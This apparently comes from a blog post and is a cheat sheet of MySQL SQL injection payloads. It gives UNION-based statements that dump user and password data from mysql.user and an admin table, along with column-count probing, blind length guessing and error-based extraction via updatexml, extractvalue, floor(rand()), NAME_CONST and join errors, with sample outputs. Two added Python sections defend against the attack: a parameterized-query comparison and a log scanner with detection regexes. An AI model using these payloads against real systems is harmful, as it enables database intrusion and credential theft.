Basic SQL Injection statements

Source: Internet
Author: User
Tags: basic, sql injection

Important System Parameters

@@datadir    data storage path
@@basedir    installation path
@@group_concat_max_len    maximum length of the string returned by GROUP_CONCAT
@@version    server version (5.5.23, etc.)
@@version_comment    version description (MySQL Community Server (GPL))
@@version_compile_os    operating system the server was built for (win32, etc.)
@@version_compile_machine    hardware platform (x86, etc.)
@@plugin_dir    plug-in path

Obtain information using UNION queries


Query basic server information

and 1=2 union select concat_ws(0x5f,user(),database(),@@version_comment,version())

Query database users

and 1=2 union select  GROUP_CONCAT(user,0x5f,password) from mysql.user



and 1=2 union select  GROUP_CONCAT(user,0x5f,password) from (select user,password from mysql.user)t


and 1=2 union select  GROUP_CONCAT(s) from (select concat_ws(0x5f,user,password)s from mysql.user)t

Query all databases (if there are multiple databases)


and 1=2  union select GROUP_CONCAT(schema_name) from information_schema.schemata
and 1=2 union select GROUP_CONCAT(schema_name) from (select schema_name from information_schema.schemata)t


and 1=2 union select GROUP_CONCAT(schema_name) from (select schema_name from information_schema.schemata where schema_name not in ('information_schema','performance_schema'))t


and 1=2 union select GROUP_CONCAT(schema_name) from (select schema_name from information_schema.schemata where schema_name not in (0x696E666F726D6174696F6E5F736368656D61,0x706572666F726D616E63655F736368656D61))t



Query all table names

Note: The length of the string returned by GROUP_CONCAT is limited by the group_concat_max_len parameter. database() can be replaced by the hexadecimal form (0x-prefixed) of the database name.


and 1=2 union select GROUP_CONCAT(table_name) from information_schema.tables where table_schema=database()


and 1=2 union select GROUP_CONCAT(table_name) from (select * from information_schema.tables where table_schema=database())t

Query all column names in a specified table

Note: The query is restricted to the current database because a table with the same name may exist in another database.


and 1=2 union select GROUP_CONCAT(column_name) from information_schema.columns where table_name=0x61646D696E and TABLE_SCHEMA=database()


and 1=2 union select GROUP_CONCAT(column_name) from (select * from information_schema.columns where table_name=0x61646D696E and TABLE_SCHEMA=database())t

Use _ to separate the fields of one admin record

Note: CONCAT returns NULL if any of its arguments is NULL; CONCAT_WS does not, it simply skips any argument that is NULL.


and 1=2 union select concat(name,0x5F,password,0x5F) from admin limit 1
and 1=2 union select concat_ws(0x5F,name,password) from admin limit 1

Concatenate all admin rows with commas (,), using _ to separate the fields of each row inside the subquery

and 1=2 union select GROUP_CONCAT(s) from (select concat_ws(0x5F,name,password)s from admin)t

Note: The preceding statement does not use GROUP BY, because all rows need to be returned. Compare:


[and 1=2 union select name,GROUP_CONCAT(s) from (select name,concat_ws(0x5F,name,password)s from admin)t group by name limit 1,1]

You can also:

and 1=2  union select GROUP_CONCAT(name,0x5F,password) from admin

Note: Again, no GROUP BY is used, because all rows need to be returned. Compare:


[and 1=2  union select name,GROUP_CONCAT(name,0x5F,password) from admin group by name limit 1,1]

Guessing the number of columns

and 1=2 union select 1
...
and 1=2 union select 1,1,...,1,1

The number of 1s in the first statement that succeeds is the number of columns; then pick whichever of those positions is displayed on the page as the output column.


If UNION cannot be used, you can use ORDER BY:

order by 10    success
order by 11    error
fields num: 10

You can also:


group by 10    success
group by 11    error
fields num: 10


After the injection, the page displays:

Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'

You can use the CONVERT() function.

For example

and 1=2  union select convert(GROUP_CONCAT(name,0x5F,password) using latin1) from admin

The unhex(hex()) method also seems to work.

and 1=2  union select unhex(hex(GROUP_CONCAT(name,0x5F,password))) from admin


If the page displays "Illegal mix of collations for operation 'UNION'":

Use the hex() function

and 1=2  union select hex(GROUP_CONCAT(name,0x5F,password)) from admin


Check whether a table exists

and 0<>(select count(*) from admin)

Guessing the number of records

and 0<(select count(*) from admin)    ok
and 1<(select count(*) from admin)    no
num: 1

Guess the field name

and 1=(select count(*) from admin where length(name)>0)

Guessing the field length

and 1=(select count(*) from admin where length(name)>6)    error
and 1=(select count(*) from admin where length(name)>5)    correct, so the length is 6
and 1=(select count(*) from admin where length(name)=6)    correct

id='1', where the value is wrapped in single quotes (and ' is not escaped)

'and 1 =2 union select concat_ws(0x5f,user,password) from mysql.user where user!='null

Finally:

select * from admin where id='1['and 1 =2 union select concat_ws(0x5f,user,password) from mysql.user where user!='null]'

Here the part inside [] is the injected statement.
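The statement above only works because the application builds the query by concatenating the id value into a quoted string literal. The following is an added example (not code from the original article): a Python/sqlite3 reproduction of that construction next to its parameterized form. The `admin` and `users` tables and their rows are constructed here; because this is sqlite rather than MySQL, the page's `concat_ws(0x5f,user,password) from mysql.user` is written as `user||'_'||password from users`.

```python
import sqlite3

# Constructed in-memory schema: `admin` stands in for the page's admin table,
# `users` is a local substitute for MySQL's mysql.user (assumption for sqlite).
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE admin(id INTEGER PRIMARY KEY, name TEXT, password TEXT);
        INSERT INTO admin VALUES (1, 'ad123', 'p@ss1');
        CREATE TABLE users(user TEXT, password TEXT);
        INSERT INTO users VALUES ('root', 'toor'), ('app', 'app-secret');
    """)
    return conn

# Same shape as the page's final statement, rewritten for sqlite:
# concat_ws(0x5f,...) -> user||'_'||password, mysql.user -> users.
PAYLOAD = "1' and 1=2 union select user||'_'||password from users where user!='null"

def lookup_vulnerable(conn, user_input):
    # The page's pattern: select * from admin where id='<input>'
    # The quote inside user_input closes the literal, so the rest is parsed as SQL.
    sql = "select name from admin where id='" + user_input + "'"
    return [row[0] for row in conn.execute(sql)]

def lookup_parameterized(conn, user_input):
    # Bound parameter: the whole input is compared against id as one value,
    # so the quote and the UNION never reach the parser as SQL.
    try:
        rows = conn.execute("select name from admin where id=?", (user_input,))
        return [row[0] for row in rows]
    except sqlite3.Error as exc:
        # Log the real error server-side and return nothing to the client:
        # the error-based techniques on this page depend on the raw message
        # being echoed back in the page.
        print("db error (logged, not shown to user):", exc)
        return []

if __name__ == "__main__":
    conn = build_db()
    print("vulnerable, normal input:", lookup_vulnerable(conn, "1"))
    print("vulnerable, payload:     ", lookup_vulnerable(conn, PAYLOAD))
    print("parameterized, normal:   ", lookup_parameterized(conn, "1"))
    print("parameterized, payload:  ", lookup_parameterized(conn, PAYLOAD))
```

With the concatenated query the payload returns every `user_password` pair from the second table; with the bound parameter the same string simply matches no id and the result is empty.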



Obtaining information through error messages

1. Non-existent function error

sql: select * from t1 where id = a()
inject: a()
error: #1305 - FUNCTION test.a does not exist

The database is test.

2. updatexml error (0x5c, 0x7e)

Note: The error message shows 32 characters.

sql: SELECT * FROM t1 WHERE id= 1 and updatexml(1,concat(0x7e,(select version()),0x7e),1)
inject: and updatexml(1,concat(0x7e,(select version()),0x7e),1)
error: #1105 - XPATH syntax error: '~5.5.23~'


The database version is 5.5.23.


sql: SELECT * FROM t1 WHERE id= 1 and updatexml(1,concat(0x7e,(select GROUP_CONCAT(schema_name) from information_schema.schemata),0x7e),1)

Note: With this statement only part of the output is visible (see the 32-character limit above).


sql: SELECT * FROM t1 WHERE id= 1 and updatexml(1,concat(0x5f,(select schema_name from information_schema.schemata limit 1,1),0x5f),1)

Note: No error is returned for this statement.


sql: SELECT * FROM t1 WHERE id= 1 and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 1,1),0x7e),1)
error: #1105 - XPATH syntax error: '~test~'

One database is named test.


sql: SELECT * FROM t1 WHERE id= 1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=0x74657374 LIMIT 0,1),0x7e),1)
error: #1105 - XPATH syntax error: '~t1~'

One table is t1.


sql: SELECT * FROM t1 WHERE id= 1 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='t1' LIMIT 0,1),0x7e),1)
error: #1105 - XPATH syntax error: '~id~'

One column is id.


sql: SELECT * FROM t1 WHERE id= 1 and updatexml(1,concat(0x7e,(select concat(name,0x3a,pass) from t1 limit 0,1),0x7e),1)
error: #1105 - Character set 'ucs2' is not supported by XPATH

sql: SELECT * FROM t1 WHERE id= 1 and updatexml(1,concat(0x7e,(select hex(concat(name,0x3a,pass)) from t1 limit 0,1),0x7e),1)


sql: SELECT * FROM t1 WHERE id= 1 and updatexml(1,concat(0x7e,(select concat(name) from t1 limit 0,1),0x7e),1)
error: #1105 - XPATH syntax error: '~ad123~'

The value of the name field is ad123.


3. Error via floor(rand()) and GROUP BY: Duplicate entry

sql: SELECT * FROM t1 WHERE id= 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)
error: #1062 - Duplicate entry '5.5.231' for key 'group_key'

The database version is 5.5.23; the trailing 1 is the digit appended by floor(rand(0)*2).


sql: SELECT * FROM t1 WHERE id= 1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)
error: #1062 - Duplicate entry 'test@localhost1' for key 'group_key'

The username is test@localhost.


sql: SELECT * FROM t1 WHERE id= 1 and (select 1 from (select count(*),concat((select concat(pass) from test.t2 where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);

Replacing the first concat argument with a subquery does not trigger the Duplicate entry error, for some reason.

Note: On closer analysis, the value returned by the subquery must come from a column with a "uniqueness" attribute (not a unique value, but a property of the table structure): for example id is the primary key and name is unique, while pass has neither. The error is raised for id; name; concat(id); concat(id,name). It is not raised for pass, concat(pass) or concat(id,pass).


4. extractvalue (0x5c, 0x7e)

Note: The output is limited to 32 characters.


Obtain one table name at a time

SELECT * FROM t1 WHERE id= 1 and extractvalue(1, concat(0x7e, (select table_name from information_schema.tables limit 0,1)));

Obtain several table names at a time (three here)

SELECT * FROM t1 WHERE id= 1 and extractvalue(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables limit 0,3)));


5. Injection using NAME_CONST (MySQL version >= 5.0.12)

Note: If the version is known to be > 5.1.35 (other versions were not tested), the following error occurs instead: Incorrect arguments to NAME_CONST. The argument must be a constant.

SELECT * FROM t1 WHERE id= 1 and 1=(select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)


SELECT * FROM test.t1 WHERE id= 1 and 1=(select * from (select NAME_CONST((select GROUP_CONCAT(table_name) from information_schema.tables where table_schema=database()),1),NAME_CONST((1),1)) as x)


Obtaining column names through a join error

Note: At least one column name must already be known.

sql: SELECT * FROM test.t1 WHERE id= 1 and (select * from(select * from test.t2 a join test.t2 b using(id,name))c);
error: Duplicate column name 'pass'

Another column is pass.


SELECT * FROM test.t1 WHERE id= 1 and (select * from(select * from  test.t2 a join test.t2 b using(id,name,pass))c);

Another column is sta.
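Every technique in this section works only because the raw MySQL error text (#1305, #1105 XPATH syntax error, #1062 Duplicate entry, Duplicate column name) reaches the page. From the defender's side the same strings are a reliable signal. The following is an added example, not part of the original article: a small Python scanner that runs the request-side payload shapes and the response-side error strings listed on this page over a few constructed log lines. The log format (`request -> response`) and the sample lines are assumptions made for the example.

```python
import re

# Constructed sample log lines: decoded request, then the text the app returned.
# Payload shapes are copied from the statements on this page.
SAMPLE_LOG = [
    "GET /item?id=1 -> 200 OK",
    "GET /item?id=1 and 1=2 union select GROUP_CONCAT(schema_name) from information_schema.schemata -> 200 OK",
    "GET /item?id=1 and updatexml(1,concat(0x7e,(select version()),0x7e),1) -> 500 #1105 - XPATH syntax error: '~5.5.23~'",
    "GET /item?id=1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) -> 500 #1062 - Duplicate entry '5.5.231' for key 'group_key'",
    "GET /item?id=a() -> 500 #1305 - FUNCTION test.a does not exist",
    "GET /item?id=42 -> 200 OK",
]

# Request-side signatures, one per technique described on this page.
REQUEST_SIGNATURES = {
    "union-based": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema-enum": re.compile(r"\binformation_schema\.|\bmysql\.user\b", re.I),
    "error-xpath": re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I),
    "error-dup-entry": re.compile(r"\bfloor\s*\(\s*rand\s*\(", re.I),
    "error-name-const": re.compile(r"\bname_const\s*\(", re.I),
    "column-count": re.compile(r"\b(order|group)\s+by\s+\d+\b", re.I),
}

# Response-side signatures: raw MySQL errors echoed to the client. Any hit here
# means the application leaks the oracle that error-based injection needs,
# regardless of whether the request itself looked suspicious.
RESPONSE_SIGNATURES = {
    "xpath-error": re.compile(r"XPATH syntax error", re.I),
    "duplicate-entry": re.compile(r"Duplicate entry .* for key", re.I),
    "missing-function": re.compile(r"FUNCTION \S+ does not exist", re.I),
    "duplicate-column": re.compile(r"Duplicate column name", re.I),
    "collation": re.compile(r"Illegal mix of collations", re.I),
}

def analyze_line(line):
    """Split one log line into request and response and match both sides."""
    request, _, response = line.partition(" -> ")
    techniques = sorted(k for k, p in REQUEST_SIGNATURES.items() if p.search(request))
    leaked = sorted(k for k, p in RESPONSE_SIGNATURES.items() if p.search(response))
    return {
        "request": request,
        "techniques": techniques,
        "leaked_errors": leaked,
        # A payload that also produced a leaked DB error is a working oracle.
        "confirmed": bool(techniques and leaked),
    }

def scan(lines):
    """Return findings for every line with either a suspicious request or a leaked error."""
    findings = (analyze_line(line) for line in lines)
    return [f for f in findings if f["techniques"] or f["leaked_errors"]]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        flag = "CONFIRMED" if finding["confirmed"] else "suspect"
        print(f"[{flag}] {finding['techniques']} {finding['leaked_errors']} <- {finding['request'][:60]}")
```

The "confirmed" flag is the one worth alerting on: a request carrying one of the page's payload shapes whose response contains the corresponding MySQL error means the oracle is live, and the fix is the same in every case, bind parameters and stop echoing database errors to the client.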


This article is from the "lunnlew" blog, please be sure to keep this source http://lunnlew.blog.51cto.com/7622269/1297384
